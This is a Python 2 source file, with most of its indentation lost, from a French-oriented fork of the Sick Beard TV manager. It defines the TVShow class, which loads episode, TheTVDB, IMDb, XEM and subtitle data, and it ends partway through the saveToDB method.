# URL: http://code.google.com/p/sickbeard/
#
# This file is part of Sick Beard.
#
# Sick Beard is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Sick Beard is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Sick Beard. If not, see <http://www.gnu.org/licenses/>.
from __future__ import with_statement
import os.path
import datetime
import threading
import re
import glob
try:
import json
except ImportError:
from lib import simplejson as json
import urllib2, httplib
import traceback
import hashlib
from sickbeard import common
import sickbeard
import xml.etree.cElementTree as etree
from name_parser.parser import NameParser, InvalidNameException
from frenchFinder import FrenchFinder
from lib import subliminal
from lib.tidysub import cleaner
from lib.tvdb_api import tvdb_api, tvdb_exceptions
from lib.imdb import imdb
from sickbeard import db
from sickbeard import helpers, exceptions, logger
from sickbeard.exceptions import ex
from sickbeard import tvrage
from sickbeard import image_cache
from sickbeard import notifiers
from sickbeard import postProcessor
from sickbeard import subtitles
from sickbeard import history
from sickbeard import encodingKludge as ek
from common import Quality, Overview
from common import DOWNLOADED, SNATCHED, SNATCHED_PROPER, SNATCHED_FRENCH, ARCHIVED, IGNORED, UNAIRED, WANTED, SKIPPED, UNKNOWN
from common import NAMING_DUPLICATE, NAMING_EXTEND, NAMING_LIMITED_EXTEND, NAMING_SEPARATED_REPEAT, NAMING_LIMITED_EXTEND_E_PREFIXED
class TVShow(object):
def __init__ (self, tvdbid, lang="", audio_lang=""):
self.tvdbid = tvdbid
self._location = ""
self.name = ""
self.tvrid = 0
self.tvrname = ""
self.imdbid = ""
self.network = ""
self.genre = ""
self.runtime = 0
self.imdb_info = {}
self.quality = int(sickbeard.QUALITY_DEFAULT)
self.flatten_folders = int(sickbeard.FLATTEN_FOLDERS_DEFAULT)
self.status = ""
self.airs = ""
self.startyear = 0
self.paused = 0
self.frenchsearch = 0
self.air_by_date = 0
self.subtitles = int(sickbeard.SUBTITLES_DEFAULT if sickbeard.SUBTITLES_DEFAULT else 0)
self.lang = lang
self.audio_lang = audio_lang
self.lock = threading.Lock()
self._isDirGood = False
self.episodes = {}
otherShow = helpers.findCertainShow(sickbeard.showList, self.tvdbid)
if otherShow != None:
raise exceptions.MultipleShowObjectsException("Can't create a show if it already exists")
self.loadFromDB()
self.saveToDB()
def _getLocation(self):
# no dir check needed if missing show dirs are created during post-processing
if sickbeard.CREATE_MISSING_SHOW_DIRS:
return self._location
        if ek.ek(os.path.isdir, self._location):
            return self._location
        else:
            raise exceptions.ShowDirNotFoundException("Show folder doesn't exist, you shouldn't be using it")
def _setLocation(self, newLocation):
logger.log(u"Setter sets location to " + newLocation, logger.DEBUG)
# Don't validate dir if user wants to add shows without creating a dir
if sickbeard.ADD_SHOWS_WO_DIR or ek.ek(os.path.isdir, newLocation):
self._location = newLocation
self._isDirGood = True
else:
raise exceptions.NoNFOException("Invalid folder for the show!")
location = property(_getLocation, _setLocation)
# delete references to anything that's not in the internal lists
def flushEpisodes(self):
for curSeason in self.episodes:
for curEp in self.episodes[curSeason]:
myEp = self.episodes[curSeason][curEp]
self.episodes[curSeason][curEp] = None
del myEp
def hasSnatchedEpisodes(self):
myDB = db.DBConnection()
sql_selection = "SELECT COUNT(*) FROM tv_episodes where showid = " + str(self.tvdbid) + " AND (status % 100) IN (" + str(SNATCHED) + "," + str(SNATCHED_PROPER) + "," + str(SNATCHED_FRENCH) + ")"
count = myDB.select(sql_selection)
return (count[0][0] > 0)
def getAllEpisodes(self, season=None, has_location=False):
myDB = db.DBConnection()
sql_selection = "SELECT season, episode, "
# subselection to detect multi-episodes early, share_location > 0
sql_selection = sql_selection + " (SELECT COUNT (*) FROM tv_episodes WHERE showid = tve.showid AND season = tve.season AND location != '' AND location = tve.location AND episode != tve.episode) AS share_location "
sql_selection = sql_selection + " FROM tv_episodes tve WHERE showid = " + str(self.tvdbid)
if season is not None:
sql_selection = sql_selection + " AND season = " + str(season)
if has_location:
sql_selection = sql_selection + " AND location != '' "
# need ORDER episode ASC to rename multi-episodes in order S01E01-02
sql_selection = sql_selection + " ORDER BY season ASC, episode ASC"
results = myDB.select(sql_selection)
ep_list = []
for cur_result in results:
cur_ep = self.getEpisode(int(cur_result["season"]), int(cur_result["episode"]))
if cur_ep:
if cur_ep.location:
# if there is a location, check if it's a multi-episode (share_location > 0) and put them in relatedEps
if cur_result["share_location"] > 0:
related_eps_result = myDB.select("SELECT * FROM tv_episodes WHERE showid = ? AND season = ? AND location = ? AND episode != ? ORDER BY episode ASC", [self.tvdbid, cur_ep.season, cur_ep.location, cur_ep.episode])
for cur_related_ep in related_eps_result:
related_ep = self.getEpisode(int(cur_related_ep["season"]), int(cur_related_ep["episode"]))
if related_ep not in cur_ep.relatedEps:
cur_ep.relatedEps.append(related_ep)
ep_list.append(cur_ep)
return ep_list
def getEpisode(self, season, episode, file=None, noCreate=False, scene=False):
#return TVEpisode(self, season, episode)
def createCurSeasonDict():
if not season in self.episodes:
self.episodes[season] = {}
createCurSeasonDict()
ep = None
if (not episode in self.episodes[season] or self.episodes[season][episode] == None) or scene:
if noCreate:
return None
logger.log(str(self.tvdbid) + ": An object for episode " + str(season) + "x" + str(episode) + " didn't exist in the cache, trying to create it", logger.DEBUG)
if file != None:
ep = TVEpisode(self, season, episode, file, scene)
else:
ep = TVEpisode(self, season, episode, scene=scene)
if ep != None:
if scene: # if scene mode was active we need to use the new ep season episode numbers
season = ep.season
episode = ep.episode
createCurSeasonDict() # recheck current "real" season dict
self.episodes[season][episode] = ep
return self.episodes[season][episode]
def writeShowNFO(self):
result = False
if not ek.ek(os.path.isdir, self._location):
logger.log(str(self.tvdbid) + u": Show dir doesn't exist, skipping NFO generation")
return False
for cur_provider in sickbeard.metadata_provider_dict.values():
result = cur_provider.create_show_metadata(self) or result
return result
def writeMetadata(self, show_only=False):
if not ek.ek(os.path.isdir, self._location):
logger.log(str(self.tvdbid) + u": Show dir doesn't exist, skipping NFO generation")
return
self.getImages()
self.writeShowNFO()
if not show_only:
self.writeEpisodeNFOs()
def writeEpisodeNFOs (self):
if not ek.ek(os.path.isdir, self._location):
logger.log(str(self.tvdbid) + ": Show dir doesn't exist, skipping NFO generation")
return
logger.log(str(self.tvdbid) + ": Writing NFOs for all episodes")
myDB = db.DBConnection()
sqlResults = myDB.select("SELECT * FROM tv_episodes WHERE showid = ? AND location != ''", [self.tvdbid])
for epResult in sqlResults:
logger.log(str(self.tvdbid) + ": Retrieving/creating episode " + str(epResult["season"]) + "x" + str(epResult["episode"]), logger.DEBUG)
curEp = self.getEpisode(epResult["season"], epResult["episode"])
curEp.createMetaFiles()
# find all media files in the show folder and create episodes for as many as possible
def loadEpisodesFromDir (self):
if not ek.ek(os.path.isdir, self._location):
logger.log(str(self.tvdbid) + ": Show dir doesn't exist, not loading episodes from disk")
return
logger.log(str(self.tvdbid) + ": Loading all episodes from the show directory " + self._location)
# get file list
mediaFiles = helpers.listMediaFiles(self._location)
# create TVEpisodes from each media file (if possible)
for mediaFile in mediaFiles:
curEpisode = None
logger.log(str(self.tvdbid) + ": Creating episode from " + mediaFile, logger.DEBUG)
try:
curEpisode = self.makeEpFromFile(ek.ek(os.path.join, self._location, mediaFile))
except (exceptions.ShowNotFoundException, exceptions.EpisodeNotFoundException), e:
logger.log(u"Episode "+mediaFile+" returned an exception: "+ex(e), logger.ERROR)
continue
except exceptions.EpisodeDeletedException:
logger.log(u"The episode deleted itself when I tried making an object for it", logger.DEBUG)
if curEpisode is None:
continue
# see if we should save the release name in the db
ep_file_name = ek.ek(os.path.basename, curEpisode.location)
ep_file_name = ek.ek(os.path.splitext, ep_file_name)[0]
parse_result = None
try:
np = NameParser(False)
parse_result = np.parse(ep_file_name)
except InvalidNameException:
pass
if not ' ' in ep_file_name and parse_result and parse_result.release_group:
logger.log(u"Name " + ep_file_name + " gave release group of " + parse_result.release_group + ", seems valid", logger.DEBUG)
curEpisode.release_name = ep_file_name
# store the reference in the show
if curEpisode != None:
if self.subtitles:
try:
curEpisode.refreshSubtitles()
except:
logger.log(str(self.tvdbid) + ": Could not refresh subtitles", logger.ERROR)
logger.log(traceback.format_exc(), logger.DEBUG)
curEpisode.saveToDB()
def loadEpisodesFromDB(self):
logger.log(u"Loading all episodes from the DB")
myDB = db.DBConnection()
sql = "SELECT * FROM tv_episodes WHERE showid = ?"
sqlResults = myDB.select(sql, [self.tvdbid])
scannedEps = {}
ltvdb_api_parms = sickbeard.TVDB_API_PARMS.copy()
if self.lang:
ltvdb_api_parms['language'] = self.lang
t = tvdb_api.Tvdb(**ltvdb_api_parms)
cachedShow = t[self.tvdbid]
cachedSeasons = {}
for curResult in sqlResults:
deleteEp = False
curSeason = int(curResult["season"])
curEpisode = int(curResult["episode"])
if curSeason not in cachedSeasons:
try:
cachedSeasons[curSeason] = cachedShow[curSeason]
except tvdb_exceptions.tvdb_seasonnotfound, e:
logger.log(u"Error when trying to load the episode from TVDB: "+e.message, logger.WARNING)
deleteEp = True
if not curSeason in scannedEps:
scannedEps[curSeason] = {}
logger.log(u"Loading episode "+str(curSeason)+"x"+str(curEpisode)+" from the DB", logger.DEBUG)
try:
curEp = self.getEpisode(curSeason, curEpisode)
# if we found out that the ep is no longer on TVDB then delete it from our database too
if deleteEp:
curEp.deleteEpisode()
curEp.loadFromDB(curSeason, curEpisode)
curEp.loadFromTVDB(tvapi=t, cachedSeason=cachedSeasons[curSeason])
scannedEps[curSeason][curEpisode] = True
except exceptions.EpisodeDeletedException:
logger.log(u"Tried loading an episode from the DB that should have been deleted, skipping it", logger.DEBUG)
continue
return scannedEps
def loadEpisodesFromTVDB(self, cache=True):
# There's gotta be a better way of doing this but we don't wanna
# change the cache value elsewhere
ltvdb_api_parms = sickbeard.TVDB_API_PARMS.copy()
if not cache:
ltvdb_api_parms['cache'] = False
if self.lang:
ltvdb_api_parms['language'] = self.lang
try:
t = tvdb_api.Tvdb(**ltvdb_api_parms)
showObj = t[self.tvdbid]
except tvdb_exceptions.tvdb_error:
logger.log(u"TVDB timed out, unable to update episodes from TVDB", logger.ERROR)
return None
logger.log(str(self.tvdbid) + ": Loading all episodes from theTVDB...")
scannedEps = {}
for season in showObj:
scannedEps[season] = {}
for episode in showObj[season]:
# need some examples of wtf episode 0 means to decide if we want it or not
if episode == 0:
continue
try:
#ep = TVEpisode(self, season, episode)
ep = self.getEpisode(season, episode)
except exceptions.EpisodeNotFoundException:
logger.log(str(self.tvdbid) + ": TVDB object for " + str(season) + "x" + str(episode) + " is incomplete, skipping this episode")
continue
else:
try:
ep.loadFromTVDB(tvapi=t)
except exceptions.EpisodeDeletedException:
logger.log(u"The episode was deleted, skipping the rest of the load")
continue
with ep.lock:
logger.log(str(self.tvdbid) + ": Loading info from theTVDB for episode " + str(season) + "x" + str(episode), logger.DEBUG)
ep.loadFromTVDB(season, episode, tvapi=t)
if ep.dirty:
ep.saveToDB()
scannedEps[season][episode] = True
return scannedEps
def loadEpisodeSceneNumbers(self):
url = "http://thexem.de/map/all?id=%s&origin=tvdb&destination=scene" % self.tvdbid
logger.log("xem url: " + url, logger.DEBUG)
opener = urllib2.build_opener()
try:
f = opener.open(url)
except (EOFError, IOError), e:
logger.log(u"Unable to connect to XEM. Is thexem.de down ?" + ex(e), logger.ERROR)
return False
except httplib.InvalidURL, e:
logger.log(u"Invalid XEM host. Is thexem.de down ?: " + ex(e), logger.ERROR)
return False
if not f:
logger.log(u"Empty response from " + url + ": " + ex(e), logger.ERROR)
return False
try:
xemJson = json.loads(f.read())
        except ValueError, e:
            logger.log(u"Unable to parse XEM response for " + url + ": " + ex(e), logger.WARNING)
            xemJson = {'result': 'failure', 'data': []}
epList = self.loadEpisodesFromDB()
for curSeason in epList:
for curEp in epList[curSeason]:
epObj = self.getEpisode(curSeason, curEp)
epObj.scene_season = None
epObj.scene_episode = None
epObj.saveToDB()
if xemJson['result'] == 'failure':
return False
for epNumbers in xemJson['data']:
tvdb = epNumbers['tvdb']
scene = epNumbers['scene']
            if not tvdb['season'] in epList or not tvdb['episode'] in epList[tvdb['season']]:
                logger.log(str(self.tvdbid) + ": NOT adding scene number. tvdb: " + str(tvdb) + "| scene: " + str(scene) + " because we don't have an ep with this (tvdb) SxxExx", logger.WARNING)
                continue
logger.log(str(self.tvdbid) + ": adding scene number. tvdb: " + str(tvdb) + "| scene: " + str(scene), logger.DEBUG)
curEp = self.getEpisode(tvdb['season'], tvdb['episode'])
curEp.scene_season = scene['season']
curEp.scene_episode = scene['episode']
curEp.saveToDB()
return True
def setTVRID(self, force=False):
if self.tvrid != 0 and not force:
logger.log(u"No need to get the TVRage ID, it's already populated", logger.DEBUG)
return
logger.log(u"Attempting to retrieve the TVRage ID", logger.DEBUG)
try:
# load the tvrage object, it will set the ID in its constructor if possible
tvrage.TVRage(self)
self.saveToDB()
except exceptions.TVRageException, e:
logger.log(u"Couldn't get TVRage ID because we're unable to sync TVDB and TVRage: "+ex(e), logger.DEBUG)
return
def getImages(self, fanart=None, poster=None):
poster_result = fanart_result = season_thumb_result = False
for cur_provider in sickbeard.metadata_provider_dict.values():
logger.log("Running season folders for "+cur_provider.name, logger.DEBUG)
poster_result = cur_provider.create_poster(self) or poster_result
fanart_result = cur_provider.create_fanart(self) or fanart_result
season_thumb_result = cur_provider.create_season_thumbs(self) or season_thumb_result
return poster_result or fanart_result or season_thumb_result
def loadLatestFromTVRage(self):
try:
# load the tvrage object
tvr = tvrage.TVRage(self)
newEp = tvr.findLatestEp()
if newEp != None:
logger.log(u"TVRage gave us an episode object - saving it for now", logger.DEBUG)
newEp.saveToDB()
# make an episode out of it
except exceptions.TVRageException, e:
logger.log(u"Unable to add TVRage info: " + ex(e), logger.WARNING)
# make a TVEpisode object from a media file
def makeEpFromFile(self, file):
if not ek.ek(os.path.isfile, file):
logger.log(str(self.tvdbid) + ": That isn't even a real file dude... " + file)
return None
logger.log(str(self.tvdbid) + ": Creating episode object from " + file, logger.DEBUG)
try:
myParser = NameParser()
parse_result = myParser.parse(file)
except InvalidNameException:
logger.log(u"Unable to parse the filename "+file+" into a valid episode", logger.ERROR)
return None
if len(parse_result.episode_numbers) == 0 and not parse_result.air_by_date:
logger.log("parse_result: "+str(parse_result))
logger.log(u"No episode number found in "+file+", ignoring it", logger.DEBUG)
return None
# for now lets assume that any episode in the show dir belongs to that show
season = parse_result.season_number if parse_result.season_number != None else 1
episodes = parse_result.episode_numbers
rootEp = None
# if we have an air-by-date show then get the real season/episode numbers
if parse_result.air_by_date:
try:
# There's gotta be a better way of doing this but we don't wanna
# change the cache value elsewhere
ltvdb_api_parms = sickbeard.TVDB_API_PARMS.copy()
if self.lang:
ltvdb_api_parms['language'] = self.lang
t = tvdb_api.Tvdb(**ltvdb_api_parms)
epObj = t[self.tvdbid].airedOn(parse_result.air_date)[0]
season = int(epObj["seasonnumber"])
episodes = [int(epObj["episodenumber"])]
except tvdb_exceptions.tvdb_episodenotfound:
logger.log(u"Unable to find episode with date " + str(parse_result.air_date) + " for show " + self.name + ", skipping", logger.WARNING)
return None
except tvdb_exceptions.tvdb_error, e:
logger.log(u"Unable to contact TVDB: "+ex(e), logger.WARNING)
return None
for curEpNum in episodes:
episode = int(curEpNum)
logger.log(str(self.tvdbid) + ": " + file + " parsed to " + self.name + " " + str(season) + "x" + str(episode), logger.DEBUG)
checkQualityAgain = False
same_file = False
curEp = self.getEpisode(season, episode)
if curEp == None:
try:
curEp = self.getEpisode(season, episode, file)
except exceptions.EpisodeNotFoundException:
logger.log(str(self.tvdbid) + ": Unable to figure out what this file is, skipping", logger.ERROR)
continue
else:
# if there is a new file associated with this ep then re-check the quality
if curEp.location and ek.ek(os.path.normpath, curEp.location) != ek.ek(os.path.normpath, file):
logger.log(u"The old episode had a different file associated with it, I will re-check the quality based on the new filename "+file, logger.DEBUG)
checkQualityAgain = True
with curEp.lock:
old_size = curEp.file_size
curEp.location = file
# if the sizes are the same then it's probably the same file
if old_size and curEp.file_size == old_size:
same_file = True
else:
same_file = False
curEp.checkForMetaFiles()
if rootEp == None:
rootEp = curEp
else:
if curEp not in rootEp.relatedEps:
rootEp.relatedEps.append(curEp)
# if it's a new file then
if not same_file:
curEp.release_name = ''
# if they replace a file on me I'll make some attempt at re-checking the quality unless I know it's the same file
if checkQualityAgain and not same_file:
newQuality = Quality.nameQuality(file)
logger.log(u"Since this file has been renamed, I checked "+file+" and found quality "+Quality.qualityStrings[newQuality], logger.DEBUG)
if newQuality != Quality.UNKNOWN:
curEp.status = Quality.compositeStatus(DOWNLOADED, newQuality)
# check for status/quality changes as long as it's a new file
elif not same_file and sickbeard.helpers.isMediaFile(file) and curEp.status not in Quality.DOWNLOADED + [ARCHIVED, IGNORED]:
oldStatus, oldQuality = Quality.splitCompositeStatus(curEp.status)
newQuality = Quality.nameQuality(file)
if newQuality == Quality.UNKNOWN:
newQuality = Quality.assumeQuality(file)
newStatus = None
# if it was snatched and now exists then set the status correctly
if oldStatus == SNATCHED and oldQuality <= newQuality:
logger.log(u"STATUS: this ep used to be snatched with quality "+Quality.qualityStrings[oldQuality]+" but a file exists with quality "+Quality.qualityStrings[newQuality]+" so I'm setting the status to DOWNLOADED", logger.DEBUG)
newStatus = DOWNLOADED
# if it was snatched proper and we found a higher quality one then allow the status change
elif (oldStatus == SNATCHED_PROPER or oldStatus == SNATCHED_FRENCH) and oldQuality < newQuality:
logger.log(u"STATUS: this ep used to be snatched proper with quality "+Quality.qualityStrings[oldQuality]+" but a file exists with quality "+Quality.qualityStrings[newQuality]+" so I'm setting the status to DOWNLOADED", logger.DEBUG)
newStatus = DOWNLOADED
elif oldStatus not in (SNATCHED, SNATCHED_PROPER, SNATCHED_FRENCH):
newStatus = DOWNLOADED
if newStatus != None:
with curEp.lock:
logger.log(u"STATUS: we have an associated file, so setting the status from "+str(curEp.status)+" to DOWNLOADED/" + str(Quality.statusFromName(file)), logger.DEBUG)
curEp.status = Quality.compositeStatus(newStatus, newQuality)
history.logDownload(curEp, file, newQuality, parse_result.release_group)
with curEp.lock:
curEp.saveToDB()
# creating metafiles on the root should be good enough
if rootEp != None:
with rootEp.lock:
rootEp.createMetaFiles()
return rootEp
def loadFromDB(self, skipNFO=False):
logger.log(str(self.tvdbid) + ": Loading show info from database")
myDB = db.DBConnection()
sqlResults = myDB.select("SELECT * FROM tv_shows WHERE tvdb_id = ?", [self.tvdbid])
if len(sqlResults) > 1:
raise exceptions.MultipleDBShowsException()
elif len(sqlResults) == 0:
logger.log(str(self.tvdbid) + ": Unable to find the show in the database")
return
else:
if self.name == "":
self.name = sqlResults[0]["show_name"]
self.tvrname = sqlResults[0]["tvr_name"]
if self.network == "":
self.network = sqlResults[0]["network"]
if self.genre == "":
self.genre = sqlResults[0]["genre"]
self.runtime = sqlResults[0]["runtime"]
self.status = sqlResults[0]["status"]
if self.status == None:
self.status = ""
self.airs = sqlResults[0]["airs"]
if self.airs == None:
self.airs = ""
self.startyear = sqlResults[0]["startyear"]
if self.startyear == None:
self.startyear = 0
self.air_by_date = sqlResults[0]["air_by_date"]
if self.air_by_date == None:
self.air_by_date = 0
self.subtitles = sqlResults[0]["subtitles"]
if self.subtitles:
self.subtitles = 1
else:
self.subtitles = 0
self.quality = int(sqlResults[0]["quality"])
self.flatten_folders = int(sqlResults[0]["flatten_folders"])
self.paused = int(sqlResults[0]["paused"])
self.frenchsearch = int(sqlResults[0]["frenchsearch"])
self._location = sqlResults[0]["location"]
if self.tvrid == 0:
self.tvrid = int(sqlResults[0]["tvr_id"])
if self.lang == "":
self.lang = sqlResults[0]["lang"]
if self.audio_lang == "":
self.audio_lang = sqlResults[0]["audio_lang"]
if self.imdbid == "":
self.imdbid = sqlResults[0]["imdb_id"]
#Get IMDb_info from database
sqlResults = myDB.select("SELECT * FROM imdb_info WHERE tvdb_id = ?", [self.tvdbid])
if len(sqlResults) == 0:
logger.log(str(self.tvdbid) + ": Unable to find IMDb show info in the database")
return
else:
self.imdb_info = dict(zip(sqlResults[0].keys(), sqlResults[0]))
def loadFromTVDB(self, cache=True, tvapi=None, cachedSeason=None):
logger.log(str(self.tvdbid) + ": Loading show info from theTVDB")
# There's gotta be a better way of doing this but we don't wanna
# change the cache value elsewhere
if tvapi is None:
ltvdb_api_parms = sickbeard.TVDB_API_PARMS.copy()
if not cache:
ltvdb_api_parms['cache'] = False
if self.lang:
ltvdb_api_parms['language'] = self.lang
t = tvdb_api.Tvdb(**ltvdb_api_parms)
else:
t = tvapi
myEp = t[self.tvdbid]
self.name = myEp["seriesname"]
self.genre = myEp['genre']
self.network = myEp['network']
self.runtime = myEp['runtime']
self.imdbid = myEp['imdb_id']
if myEp["airs_dayofweek"] != None and myEp["airs_time"] != None:
self.airs = myEp["airs_dayofweek"] + " " + myEp["airs_time"]
if myEp["firstaired"] != None and myEp["firstaired"]:
self.startyear = int(myEp["firstaired"].split('-')[0])
if self.airs == None:
self.airs = ""
if myEp["status"] != None:
self.status = myEp["status"]
if self.status == None:
self.status = ""
# self.saveToDB()
def loadIMDbInfo(self, imdbapi=None):
imdb_info = {'imdb_id' : self.imdbid,
'title' : '',
'year' : '',
'akas' : [],
'runtimes' : '',
'genres' : [],
'countries' : '',
'country codes' : '',
'certificates' : [],
'rating' : '',
'votes': '',
'last_update': ''
}
if self.imdbid:
logger.log(str(self.tvdbid) + ": Loading show info from IMDb")
i = imdb.IMDb()
imdbTv = i.get_movie(str(self.imdbid[2:]))
for key in filter(lambda x: x in imdbTv.keys(), imdb_info.keys()):
# Store only the first value for string type
if type(imdb_info[key]) == type('') and type(imdbTv.get(key)) == type([]):
imdb_info[key] = imdbTv.get(key)[0]
else:
imdb_info[key] = imdbTv.get(key)
#Filter only the value
if imdb_info['runtimes']:
imdb_info['runtimes'] = re.search('\d+',imdb_info['runtimes']).group(0)
else:
imdb_info['runtimes'] = self.runtime
if imdb_info['akas']:
imdb_info['akas'] = '|'.join(imdb_info['akas'])
else:
imdb_info['akas'] = ''
#Join all genres in a string
if imdb_info['genres']:
imdb_info['genres'] = '|'.join(imdb_info['genres'])
else:
imdb_info['genres'] = ''
#Get only the production country certificate if any
if imdb_info['certificates'] and imdb_info['countries']:
dct = {}
try:
for item in imdb_info['certificates']:
dct[item.split(':')[0]] = item.split(':')[1]
imdb_info['certificates'] = dct[imdb_info['countries']]
except:
imdb_info['certificates'] = ''
else:
imdb_info['certificates'] = ''
imdb_info['last_update'] = datetime.date.today().toordinal()
#Rename dict keys without spaces for DB upsert
        self.imdb_info = dict((k.replace(' ', '_'), v) for k, v in imdb_info.items())
logger.log(str(self.tvdbid) + ": Obtained info from IMDb ->" + str(self.imdb_info), logger.DEBUG)
def loadNFO (self):
if not os.path.isdir(self._location):
logger.log(str(self.tvdbid) + ": Show dir doesn't exist, can't load NFO")
raise exceptions.NoNFOException("The show dir doesn't exist, no NFO could be loaded")
logger.log(str(self.tvdbid) + ": Loading show info from NFO")
xmlFile = os.path.join(self._location, "tvshow.nfo")
try:
xmlFileObj = open(xmlFile, 'r')
showXML = etree.ElementTree(file = xmlFileObj)
if showXML.findtext('title') == None or (showXML.findtext('tvdbid') == None and showXML.findtext('id') == None):
raise exceptions.NoNFOException("Invalid info in tvshow.nfo (missing name or id):" \
+ str(showXML.findtext('title')) + " " \
+ str(showXML.findtext('tvdbid')) + " " \
+ str(showXML.findtext('id')))
self.name = showXML.findtext('title')
if showXML.findtext('tvdbid') != None:
self.tvdbid = int(showXML.findtext('tvdbid'))
elif showXML.findtext('id'):
self.tvdbid = int(showXML.findtext('id'))
else:
raise exceptions.NoNFOException("Empty <id> or <tvdbid> field in NFO")
except (exceptions.NoNFOException, SyntaxError, ValueError), e:
logger.log(u"There was an error parsing your existing tvshow.nfo file: " + ex(e), logger.ERROR)
logger.log(u"Attempting to rename it to tvshow.nfo.old", logger.DEBUG)
try:
xmlFileObj.close()
ek.ek(os.rename, xmlFile, xmlFile + ".old")
except Exception, e:
logger.log(u"Failed to rename your tvshow.nfo file - you need to delete it or fix it: " + ex(e), logger.ERROR)
raise exceptions.NoNFOException("Invalid info in tvshow.nfo")
if showXML.findtext('studio') != None:
self.network = showXML.findtext('studio')
if self.network == None and showXML.findtext('network') != None:
self.network = ""
if showXML.findtext('genre') != None:
self.genre = showXML.findtext('genre')
else:
self.genre = ""
# TODO: need to validate the input, I'm assuming it's good until then
def nextEpisode(self):
logger.log(str(self.tvdbid) + ": Finding the episode which airs next", logger.DEBUG)
myDB = db.DBConnection()
innerQuery = "SELECT airdate FROM tv_episodes WHERE showid = ? AND airdate >= ? AND status = ? ORDER BY airdate ASC LIMIT 1"
innerParams = [self.tvdbid, datetime.date.today().toordinal(), UNAIRED]
query = "SELECT * FROM tv_episodes WHERE showid = ? AND airdate >= ? AND airdate <= (" + innerQuery + ") and status = ?"
params = [self.tvdbid, datetime.date.today().toordinal()] + innerParams + [UNAIRED]
sqlResults = myDB.select(query, params)
if sqlResults == None or len(sqlResults) == 0:
logger.log(str(self.tvdbid) + ": No episode found... need to implement tvrage and also show status", logger.DEBUG)
return []
else:
logger.log(str(self.tvdbid) + ": Found episode " + str(sqlResults[0]["season"]) + "x" + str(sqlResults[0]["episode"]), logger.DEBUG)
foundEps = []
for sqlEp in sqlResults:
curEp = self.getEpisode(int(sqlEp["season"]), int(sqlEp["episode"]))
foundEps.append(curEp)
return foundEps
# if we didn't get an episode then try getting one from tvrage
# load tvrage info
# extract NextEpisode info
# verify that we don't have it in the DB somehow (ep mismatch)
def deleteShow(self):
myDB = db.DBConnection()
myDB.action("DELETE FROM tv_episodes WHERE showid = ?", [self.tvdbid])
myDB.action("DELETE FROM tv_shows WHERE tvdb_id = ?", [self.tvdbid])
myDB.action("DELETE FROM imdb_info WHERE tvdb_id = ?", [self.tvdbid])
# remove self from show list
sickbeard.showList = [x for x in sickbeard.showList if x.tvdbid != self.tvdbid]
# clear the cache
image_cache_dir = ek.ek(os.path.join, sickbeard.CACHE_DIR, 'images')
for cache_file in ek.ek(glob.glob, ek.ek(os.path.join, image_cache_dir, str(self.tvdbid)+'.*')):
logger.log(u"Deleting cache file "+cache_file)
os.remove(cache_file)
def populateCache(self):
cache_inst = image_cache.ImageCache()
logger.log(u"Checking & filling cache for show "+self.name)
cache_inst.fill_cache(self)
def refreshDir(self):
# make sure the show dir is where we think it is unless dirs are created on the fly
if not ek.ek(os.path.isdir, self._location) and not sickbeard.CREATE_MISSING_SHOW_DIRS:
return False
# load from dir
self.loadEpisodesFromDir()
# run through all locations from DB, check that they exist
logger.log(str(self.tvdbid) + ": Loading all episodes with a location from the database")
myDB = db.DBConnection()
sqlResults = myDB.select("SELECT * FROM tv_episodes WHERE showid = ? AND location != ''", [self.tvdbid])
for ep in sqlResults:
curLoc = os.path.normpath(ep["location"])
season = int(ep["season"])
episode = int(ep["episode"])
try:
curEp = self.getEpisode(season, episode)
except exceptions.EpisodeDeletedException:
logger.log(u"The episode was deleted while we were refreshing it, moving on to the next one", logger.DEBUG)
continue
# if the path doesn't exist or if it's not in our show dir
if not ek.ek(os.path.isfile, curLoc) or not os.path.normpath(curLoc).startswith(os.path.normpath(self.location)):
with curEp.lock:
# if it used to have a file associated with it and it doesn't anymore then set it to IGNORED
if curEp.location and curEp.status in Quality.DOWNLOADED:
logger.log(str(self.tvdbid) + ": Location for " + str(season) + "x" + str(episode) + " doesn't exist, removing it and changing our status to IGNORED", logger.DEBUG)
curEp.status = IGNORED
curEp.subtitles = list()
curEp.subtitles_searchcount = 0
curEp.subtitles_lastsearch = str(datetime.datetime.min)
curEp.location = ''
curEp.hasnfo = False
curEp.hastbn = False
curEp.release_name = ''
curEp.saveToDB()
def downloadSubtitles(self):
#TODO: Add support for force option
if not ek.ek(os.path.isdir, self._location):
logger.log(str(self.tvdbid) + ": Show dir doesn't exist, can't download subtitles", logger.DEBUG)
return
logger.log(str(self.tvdbid) + ": Downloading subtitles", logger.DEBUG)
try:
episodes = db.DBConnection().select("SELECT location FROM tv_episodes WHERE showid = ? AND location NOT LIKE '' ORDER BY season DESC, episode DESC", [self.tvdbid])
for episodeLoc in episodes:
episode = self.makeEpFromFile(episodeLoc['location']);
subtitles = episode.downloadSubtitles()
except Exception as e:
logger.log("Error occurred when downloading subtitles: " + str(e), logger.DEBUG)
return
def cleanSubtitles(self):
if not ek.ek(os.path.isdir, self._location):
logger.log(str(self.tvdbid) + ": Show dir doesn't exist, can't clean subtitles", logger.DEBUG)
return
logger.log(str(self.tvdbid) + ": Cleaning subtitles", logger.DEBUG)
try:
episodes = db.DBConnection().select("SELECT location FROM tv_episodes WHERE showid = ? AND location NOT LIKE '' ORDER BY season DESC, episode DESC", [self.tvdbid])
for episodeLoc in episodes:
episode = self.makeEpFromFile(episodeLoc['location']);
subtitles = episode.cleanSubtitles()
except Exception as e:
logger.log("Error occurred when cleaning subtitles: " + str(e), logger.DEBUG)
return
def searchFrench(self, show):
logger.log("Sending french episodes search")
FrenchFinder('force',show)
return
def saveToDB(self):
logger.log(str(self.tvdbid) + ": Saving show info to database", logger.DEBUG)
myDB = db.DBConnection()
controlValueDict = {"tvdb_id": self.tvdbid}
newValueDict = {"show_name": self.name,
"tvr_id": self.tvrid,
"location": self._location,
"network": self.network,
"genre": self.genre,
"runtime": self.runtime,
"quality": self.quality,
"airs": self.airs,
"status": self.status,
"flatten_folders": self.flatten_folders,
"frenchsearch":self.frenchsearch,
"paused": self.paused,
"air_by_date": self.air_by_date,
"subtitles": self.subtitles,
"startyear": self.startyear,
"tvr_name": self.tvrname,
"lang": self.lang,
"imdb_id": self.imdbid,
"audio_lang": self.audio_lang
}
